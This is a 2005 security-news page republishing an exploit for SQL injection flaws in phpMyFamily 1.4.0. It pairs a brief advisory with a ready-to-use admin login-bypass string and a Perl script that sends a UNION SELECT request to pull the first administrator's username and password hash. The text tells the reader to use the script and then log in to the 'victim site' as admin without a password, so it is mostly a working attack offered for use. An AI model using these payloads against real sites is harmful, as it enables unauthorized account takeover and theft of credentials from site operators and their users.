Press CTRL-D to bookmark us
Welcome Guest Login / Register / Members
Search in  
Top Submit newsSubscribe
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
 

 Sponsored links

Want to become one of our authors and see your work published on ALLSeek.iNFO ?
 
 phpMyFamily SQL Injection exploit
Categorie: Vulnerability
Posted: 2005-03-27 by basher13
Views: 808

 		Current Rating: Not rated
Poor Best
 Details
Update:
4:26 AM 3/27/2005

Subject:
" phpMyFamily SQL Injection exploit "


Description:
phpmyfamily is a dynamic genealogy website builder which allows geographically
dispersed family members to maintain a central database of research which is readily
accessable and editable. By having a central repository, family members can contribute
as and when information becomes available without requiring them to send it to a
central 'custodian', or disseminate via email, and allows anecdotal information and
possible leads to be shared.




Vulnerability:
Phpmyfamily which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "person" parameter in "people.php" and "pwdUser" parameter in "passthru.
php" isn't properly sanitised before being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation requires that "magic_quotes_gpc" is disabled.

NOTE: Some other scripts including "people.php", "track.php", "edit.php", "document.php",
"census.php", and "passthru.php" may also be affected.
The vulnerabilities have been reported in version 1.4.0. Prior versions may also be affected.

Use first the exploit code ,then got to victim site and do login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)


Exploit:

#!/usr/bin/perl -w
# phpMyFamily Injection exploit
# ==============================
$banner = "phpMyFamily Injection exploit\n\n==============================
\n\nINFGPG-Hacking&Security Research";
#
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous

use IO::Socket;
if ($#ARGV<0){
print "\n$banner";
print "\n\n Usage: perl phpMyFamily.pl <host> <path> \n\n";
exit;}

$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)

$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\r\n\r\n";
$muka=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80")
or die "$ARGV[0]Connection Failed !!\n\n";

$muka -> autoflush(1);
print $muka "$serius";
print "[*]Sending exploit DONE \n\n";
sleep(7);
close($muka);



Vendor URL:
http://www.phpmyfamily.net
 
Syndication
Permalink Email this

The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1451

User comments (post your comments here)

Only registerd members can post comments and articles
 
Previous articleBack to news listNext article
 


InterJOB.su
Bookmark us | Set As Homepage | Advertising | Contact Us | Recomend us | Link us | Links | Terms

SpyLOG Page Rank Checker
LAST QUERIES